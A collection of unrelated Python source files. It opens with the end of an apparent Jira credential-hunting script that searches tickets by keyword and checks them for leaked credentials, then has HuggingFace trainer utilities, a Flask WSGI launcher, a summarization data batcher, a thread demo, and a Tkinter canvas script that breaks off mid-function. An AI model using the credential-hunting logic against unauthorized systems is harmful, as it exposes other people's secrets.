args.url = args.url[:-1]
url = args.url
threads = args.threads
save = 0
if args.out:
save = 1
token = get_token()
print("[+] Initiating search..")
for item in sorted(search_keywords, key = len):
search_queue.put(item)
start_thread(search_worker, url, token, threads)
search_queue.join()
issue_set = list(set(issues))
print("\n[+] Search returned " + str(len(issue_set)) + " tickets")
print("[+] Fetching Jira Issues..")
start_thread(task_worker, url, token, threads)
for issueId in issue_set:
task_queue.put(issueId)
task_queue.join()
print("\n[+] Analyzing..")
check_credentials()
print("\n[+] Results\n")
if save:
display_results(results, save, args.out)
else:
display_results(results, 0)
if __name__ == "__main__":
main()
|
trainer_utils.py
|
# coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilities for the Trainer and TFTrainer class. Should be independent from PyTorch and TensorFlow.
"""
import copy
import functools
import gc
import inspect
import os
import random
import re
import threading
import time
from typing import Any, Dict, NamedTuple, Optional, Tuple, Union
import numpy as np
from .file_utils import (
ExplicitEnum,
is_psutil_available,
is_sagemaker_dp_enabled,
is_tf_available,
is_torch_available,
is_torch_cuda_available,
is_torch_tpu_available,
)
if is_torch_available():
import torch
if is_tf_available():
import tensorflow as tf
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf`` (if
installed).
Args:
seed (:obj:`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (:obj:`np.ndarray`): Predictions of the model.
label_ids (:obj:`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: np.ndarray
class EvalLoopOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
num_samples: Optional[int]
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
metrics: Dict[str, float]
PREFIX_CHECKPOINT_DIR = "checkpoint"
_re_checkpoint = re.compile(r"^" + PREFIX_CHECKPOINT_DIR + r"\-(\d+)$")
def get_last_checkpoint(folder):
content = os.listdir(folder)
checkpoints = [
path
for path in content
if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))
]
if len(checkpoints) == 0:
return
return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))
class IntervalStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class HubStrategy(ExplicitEnum):
END = "end"
EVERY_SAVE = "every_save"
CHECKPOINT = "checkpoint"
ALL_CHECKPOINTS = "all_checkpoints"
class BestRun(NamedTuple):
"""
The best run found by an hyperparameter search (see :class:`~transformers.Trainer.hyperparameter_search`).
Parameters:
run_id (:obj:`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (:obj:`float`):
The objective that was obtained for this run.
hyperparameters (:obj:`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
The default objective to maximize/minimize when doing an hyperparameter search. It is the evaluation loss if no
metrics are provided to the :class:`~transformers.Trainer`, the sum of all metrics otherwise.
Args:
metrics (:obj:`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
:obj:`float`: The objective to minimize or maximize
"""
metrics = copy.deepcopy(metrics)
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
# Remove speed metrics
speed_metrics = [m for m in metrics.keys() if m.endswith("_runtime") or m.endswith("_per_second")]
for sm in speed_metrics:
_ = metrics.pop(sm, None)
return loss if len(metrics) == 0 else sum(metrics.values())
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_tune_available
assert is_ray_tune_available(), "This function needs ray installed: `pip " "install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
}
def is_main_process(local_rank):
"""
Whether or not the current process is the local process, based on `xm.get_ordinal()` (for TPUs) first, then on
`local_rank`.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.get_ordinal() == 0
return local_rank in [-1, 0]
def total_processes_number(local_rank):
"""
Return the number of processes launched in parallel. Works with `torch.distributed` and TPUs.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.xrt_world_size()
elif is_sagemaker_dp_enabled():
import smdistributed.dataparallel.torch.distributed as dist
return dist.get_world_size()
elif local_rank != -1 and is_torch_available():
import torch
return torch.distributed.get_world_size()
return 1
def speed_metrics(split, start_time, num_samples=None, num_steps=None):
"""
Measure and return speed performance metrics.
This function requires a time snapshot `start_time` before the operation to be measured starts and this function
should be run immediately after the operation to be measured has completed.
Args:
- split: name to prefix metric (like train, eval, test...)
- start_time: operation start time
- num_samples: number of samples processed
"""
runtime = time.time() - start_time
result = {f"{split}_runtime": round(runtime, 4)}
if num_samples is not None:
samples_per_second = num_samples / runtime
result[f"{split}_samples_per_second"] = round(samples_per_second, 3)
if num_steps is not None:
steps_per_second = num_steps / runtime
result[f"{split}_steps_per_second"] = round(steps_per_second, 3)
return result
class SchedulerType(ExplicitEnum):
LINEAR = "linear"
COSINE = "cosine"
COSINE_WITH_RESTARTS = "cosine_with_restarts"
POLYNOMIAL = "polynomial"
CONSTANT = "constant"
CONSTANT_WITH_WARMUP = "constant_with_warmup"
class TrainerMemoryTracker:
"""
A helper class that tracks cpu and gpu memory.
This class will silently skip unless ``psutil`` is available. Install with ``pip install psutil``.
When a stage completes, it can pass metrics dict to update with the memory metrics gathered during this stage.
Example ::
self._memory_tracker = TrainerMemoryTracker(self.args.skip_memory_metrics)
self._memory_tracker.start()
code ...
metrics = {"train_runtime": 10.5}
self._memory_tracker.stop_and_update_metrics(metrics)
At the moment GPU tracking is only for ``pytorch``, but can be extended to support ``tensorflow``.
To understand this class' intricacies please read the documentation of :meth:`~transformers.Trainer.log_metrics`.
"""
# map trainer methods to metrics prefix
stages = {
"__init__": "init",
"train": "train",
"evaluate": "eval",
"predict": "test",
}
def __init__(self, skip_memory_metrics=False):
self.skip_memory_metrics = skip_memory_metrics
if not is_psutil_available():
# soft dependency on psutil
self.skip_memory_metrics = True
if self.skip_memory_metrics:
return
import psutil # noqa
if is_torch_cuda_available():
import torch
self.torch = torch
self.gpu = {}
else:
self.torch = None
self.process = psutil.Process()
self.cur_stage = None
self.cpu = {}
self.init_reported = False
def derive_stage(self):
"""derives the stage/caller name automatically"""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller in self.stages:
return self.stages[caller]
else:
raise ValueError(
f"was called from {caller}, but only expect to be called from one of {self.stages.keys()}"
)
def cpu_mem_used(self):
"""get resident set size memory for the current process"""
return self.process.memory_info().rss
def peak_monitor_func(self):
self.cpu_mem_used_peak = -1
while True:
self.cpu_mem_used_peak = max(self.cpu_mem_used(), self.cpu_mem_used_peak)
# can't sleep or will not catch the peak right (this comment is here on purpose)
# time.sleep(0.001) # 1msec
if not self.peak_monitoring:
break
def start(self):
"""start tracking for the caller's stage"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
self.cur_stage = stage
gc.collect()
if self.torch is not None:
self.torch.cuda.reset_peak_memory_stats()
self.torch.cuda.empty_cache()
# gpu
if self.torch is not None:
self.gpu_mem_used_at_start = self.torch.cuda.memory_allocated()
# cpu
self.cpu_mem_used_at_start = self.cpu_mem_used()
self.peak_monitoring = True
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def stop(self, stage):
"""stop tracking for the passed stage"""
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# this sends a signal to peak_monitor_func to complete its loop
self.peak_monitoring = False
# first ensure all objects get collected and their memory is freed
gc.collect()
if self.torch is not None:
self.torch.cuda.empty_cache()
# concepts:
# - alloc_delta: the difference of allocated memory between the end and the start
# - peaked_delta: the difference between the peak memory and the current memory
# in order to know how much memory the measured code consumed one needs to sum these two
# gpu
if self.torch is not None:
self.gpu_mem_used_now = self.torch.cuda.memory_allocated()
self.gpu_mem_used_peak = self.torch.cuda.max_memory_allocated()
self.gpu[self.cur_stage] = dict(
alloc=(self.gpu_mem_used_now - self.gpu_mem_used_at_start),
peaked=max(0, self.gpu_mem_used_peak - self.gpu_mem_used_now),
)
# cpu
self.cpu_mem_used_now = self.cpu_mem_used()
self.cpu[self.cur_stage] = dict(
alloc=(self.cpu_mem_used_now - self.cpu_mem_used_at_start),
peaked=max(0, self.cpu_mem_used_peak - self.cpu_mem_used_now),
)
# reset - cycle finished
self.cur_stage = None
def update_metrics(self, stage, metrics):
"""updates the metrics"""
if self.skip_memory_metrics:
return
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# since we don't have a way to return init metrics, we push them into the first of train/val/predict
stages = [stage]
if not self.init_reported:
stages.insert(0, "init")
self.init_reported = True
for stage in stages:
for t in ["alloc", "peaked"]:
if stage in self.cpu and t in self.cpu[stage]:
metrics[f"{stage}_mem_cpu_{t}_delta"] = self.cpu[stage][t]
if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
metrics[f"{stage}_mem_gpu_{t}_delta"] = self.gpu[stage][t]
def stop_and_update_metrics(self, metrics=None):
"""combine stop and metrics update in one call for simpler code"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
self.stop(stage)
# init doesn't have metrics to update so we just save that data for later stages to retrieve
if metrics is not None:
self.update_metrics(stage, metrics)
def denumpify_detensorize(metrics):
"""
Recursively calls `.item()` on the element of the dictionary passed
"""
if isinstance(metrics, (list, tuple)):
return type(metrics)(denumpify_detensorize(m) for m in metrics)
elif isinstance(metrics, dict):
return type(metrics)({k: denumpify_detensorize(v) for k, v in metrics.items()})
elif isinstance(metrics, np.generic):
return metrics.item()
elif is_torch_available() and isinstance(metrics, torch.Tensor) and metrics.numel() == 1:
return metrics.item()
return metrics
def number_of_arguments(func):
"""
Return the number of arguments of the passed function, even if it's a partial function.
"""
if isinstance(func, functools.partial):
total_args = len(inspect.signature(func.func).parameters)
return total_args - len(func.args) - len(func.keywords)
return len(inspect.signature(func).parameters)
class ShardedDDPOption(ExplicitEnum):
SIMPLE = "simple"
ZERO_DP_2 = "zero_dp_2"
ZERO_DP_3 = "zero_dp_3"
OFFLOAD = "offload"
AUTO_WRAP = "auto_wrap"
|
wsgi.py
|
import os
import sys
import logging
import threading
import gevent.monkey
import mongoengine
from app import app
import db
import worker
app.config['MONGODB_SETTINGS'] = {
'db': db.DATABASE_NAME,
'alias': db.DATABASE_ALIAS
}
@app.before_first_request
def setup_application():
mongoengine.connect(db.DATABASE_NAME, alias=db.DATABASE_ALIAS)
def build_application():
"""
Starts running the Flask application.
"""
logging.basicConfig(level=logging.DEBUG,
stream=sys.stderr,
format='%(asctime)s %(levelname)s - %(message)s')
gevent.monkey.patch_all()
t = threading.Thread(target=worker.main)
t.setDaemon(True)
t.start()
app.config['THREADED'] = True
if os.environ.get('WSGI_PRODUCTION', None) is not None:
app.config['PORT'] = 9000
else:
app.config['PORT'] = 5000
app.config['DEBUG'] = True
return app
if __name__ == '__main__':
app = build_application()
app.run(threaded=True,
debug=app.config.get('DEBUG', False),
port=app.config.get('PORT', 9000))
|
batcher.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
# Modifications Copyright 2017 Abigail See
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This file contains code to process data into batches"""
import queue as Queue
from random import shuffle
from threading import Thread
import time
import numpy as np
import tensorflow as tf
import data
class Example(object):
"""Class representing a train/val/test example for text summarization."""
def __init__(self, article, abstract_sentences, vocab, hps):
"""Initializes the Example, performing tokenization and truncation to produce the encoder, decoder and target sequences, which are stored in self.
Args:
article: source text; a string. each token is separated by a single space.
abstract_sentences: list of strings, one per abstract sentence. In each sentence, each token is separated by a single space.
vocab: Vocabulary object
hps: hyperparameters
"""
self.hps = hps
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > hps.max_enc_steps:
article_words = article_words[:hps.max_enc_steps]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if hps.pointer_gen:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
# Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, hps.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
"""Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).
Args:
sequence: List of ids (integers)
max_len: integer
start_id: integer
stop_id: integer
Returns:
inp: sequence length <=max_len starting with start_id
target: sequence same length as input, ending with stop_id only if there was no truncation
"""
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
def pad_decoder_inp_targ(self, max_len, pad_id):
"""Pad decoder input and target sequences with pad_id up to max_len."""
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if self.hps.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
"""Class representing a minibatch of train/val/test examples for text summarization."""
def __init__(self, example_list, hps, vocab):
"""Turns the example_list into a Batch object.
Args:
example_list: List of Example objects
hps: hyperparameters
vocab: Vocabulary object
"""
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list, hps) # initialize the input to the encoder
self.init_decoder_seq(example_list, hps) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list, hps):
"""Initializes the following:
self.enc_batch:
numpy array of shape (batch_size, <=max_enc_steps) containing integer ids (all OOVs represented by UNK id), padded to length of longest sequence in the batch
self.enc_lens:
numpy array of shape (batch_size) containing integers. The (truncated) length of each encoder input sequence (pre-padding).
self.enc_padding_mask:
numpy array of shape (batch_size, <=max_enc_steps), containing 1s and 0s. 1s correspond to real tokens in enc_batch and target_batch; 0s correspond to padding.
If hps.pointer_gen, additionally initializes the following:
self.max_art_oovs:
maximum number of in-article OOVs in the batch
self.art_oovs:
list of list of in-article OOVs (strings), for each example in the batch
self.enc_batch_extend_vocab:
Same as self.enc_batch, but in-article OOVs are represented by their temporary article OOV number.
"""
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((hps.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if hps.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list, hps):
"""Initializes the following:
self.dec_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids as input for the decoder, padded to max_dec_steps length.
self.target_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids for the target sequence, padded to max_dec_steps length.
self.dec_padding_mask:
numpy array of shape (batch_size, max_dec_steps), containing 1s and 0s. 1s correspond to real tokens in dec_batch and target_batch; 0s correspond to padding.
"""
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(hps.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
# Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.
self.dec_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
"""Store the original article and abstract strings in the Batch object"""
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of list of lists
class Batcher(object):
"""A class to generate minibatches of data. Buckets examples together based on length of the encoder sequence."""
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, hps, single_pass):
"""Initialize the batcher. Start threads that process the data into batches.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary object
hps: hyperparameters
single_pass: If True, run through the dataset exactly once (useful for when you want to run evaluation on the dev or test set). Otherwise generate random batches indefinitely (useful for training).
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._single_pass = single_pass
# print(self._hps.__getattr__('batch_size'))
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self._hps.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 16 # num threads to fill example queue
self._num_batch_q_threads = 4 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
tf.logging.info("single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
example = Example(article, abstract_sentences, self._vocab, self._hps) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue.
In decode mode, makes batches that each contain a single example repeated.
"""
while True:
if self._hps.mode != 'decode':
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self._hps.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i + self._hps.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
else: # beam search decode mode
ex = self._example_queue.get()
b = [ex for _ in range(self._hps.batch_size)]
self._batch_queue.put(Batch(b, self._hps, self._vocab))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
"""Generates article and abstract text from tf.Example.
Args:
example_generator: a generator of tf.Examples from file. See data.example_generator"""
while True:
e = next(example_generator) # e is a tf.Example
try:
article_text = e.features.feature['article'].bytes_list.value[0].decode() # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode() # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
tf.logging.warning('Found an example with empty article text. Skipping it.')
else:
yield (article_text, abstract_text)
|
plugin.py
|
import threading, time
def agent():
while True:
print("running agent in thread")
time.sleep(1)
print("done")
threading.Thread( target = agent ).start()
|
pruebas_canvas.py
|
from tkinter import *
from reportlab import *
from reportlab.lib.pagesizes import letter
from reportlab.pdfgen import canvas
from reportlab.lib.colors import tan, black, green
from reportlab.lib.units import inch
from reportlab.lib.units import mm
import tkinter.colorchooser as colorchooser
import math
import time
import threading
import os
os.chdir('..')
from mbarete import geometria,calculadora
global raiz,cu, largo,fondo,fondor,fondot,valor,labelcrono,textos,alto,ancho
global baseRadio,altura,revolucion,rotorRadio,fondo,angulos
class btnCanvas(object):
"""botones creados en el lienzo de canvas"""
def __init__(self, arg):
super(btnCanvas, self).__init__()
self.arg = arg
"""
Button(
self.widgets[myWidget['padre']]['widget'],
text=myWidget['text'],
width=myWidget['width'] if myWidget['width'] else None,
bg=myWidget['bgColor'],
fg=myWidget['fontColor'],
font=(myWidget['fontType'],myWidget['fontSize']),
command=lambda:threading.Thread(target=self.command[mywidget['name']][0],args=self.command[mywidget['name']][1]).start()
)
"""
largo=800
alto=largo
ancho=650
fondor= '#00001a'
fondot='#408080'
fondo='#f3a80c'
valor='texto de ejemplo'
def strToUnicode(strng):
unicod=""
for x in str(strng):
unicod += r" "+str(ord(x))
return unicod.strip()
def unicodeToStr(unicod):
strng=""
if unicod.strip()=="":
return unicod
else:
for x in unicod.split(" "):
strng += str(chr(int(x)))
return strng.strip()
escala11={
'Arial':{
' ':6.0,
'_':8.0,
'.':3.75,
'a':7.833,
'b':7.833,
'c':7.833,
'd':7.833,
'e':7.833,
'f':3.954,
'g':7.833,
'h':7.833,
'i':2.809,
'j':3.5,
'k':7.0,
'l':2.809,
'm':13.0,
'n':7.833,
'ñ':7.833,
'o':7.833,
'p':7.833,
'q':7.833,
'r':6.0,
's':7.769,
't':3.954,
'u':7.833,
'v':6.5,
'w':11.0,
'x':6.7,
'y':6.7,
'z':7.6
}
}
listaunicode={}
for letra in escala11['Arial']:
listaunicode.setdefault(strToUnicode(letra),escala11['Arial'][letra])
def strPixel(string,fontType='Arial',fontSize=11):
escala={'Arial':{'32': 6.0, '95': 8.0, '46': 3.75, '97': 7.833, '98': 7.833, '99': 7.833, '100': 7.833, '101': 7.833, '102': 3.954, '103': 7.833, '104': 7.833, '105': 2.809, '106': 3.5, '107': 7.0, '108': 2.809, '109': 13.0, '110': 7.833, '241': 7.833, '111': 7.833, '112': 7.833, '113': 7.833, '114': 6.0, '115': 7.769, '116': 3.954, '117': 7.833, '118': 6.5, '119': 11.0, '120': 6.7, '121': 6.7, '122': 7.6}}
longitud=0
for letra in string:
longitud+=escala[fontType][strToUnicode(letra)]
return longitud+1
def crono(mini=0,maxi=5,step=1,ti='seg'):
tiempo={'seg':1,'miliseg':0.001}
t=tiempo[ti]
for x in range(mini+1,maxi+1,step):
labelcrono.config(text=str(x))
raiz.update()
time.sleep(t)
def circulin(radio=10,Cx=10,Cy=10,grado0=0,gradoF=360):
r=float(radio)
centroX=float(Cx)
centroY=float(Cy)
g0=grado0
gf=gradoF
if math.fabs(grado0-gradoF)>=360:
circulo=(centroX+math.cos(math.radians(float(g0)))*r,centroY+math.sin(math.radians(float(g0)))*r)
else:
circulo=(centroX,centroY)
circulo+=(centroX+math.cos(math.radians(float(g0)))*r,centroY+math.sin(math.radians(float(g0)))*r)
for g in range(g0,gf,1):
rad=math.radians(float(g))
circulo+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
cu.create_polygon(circulo,fill=fondot,outline=fondo)
def polig(xplace,yplace,ancho,alto,radio=10,text="",fontSize=11,fontType='Arial',fill='#ff0000',outline='#ff00f0',fontColor='#ffffff',alcance=100):
if (radio*2<=alto) and (radio*2<=ancho):
r=float(radio)
else:
r=float(int(alto/2)) if alto<ancho else float(int(ancho/2))
if r>0:
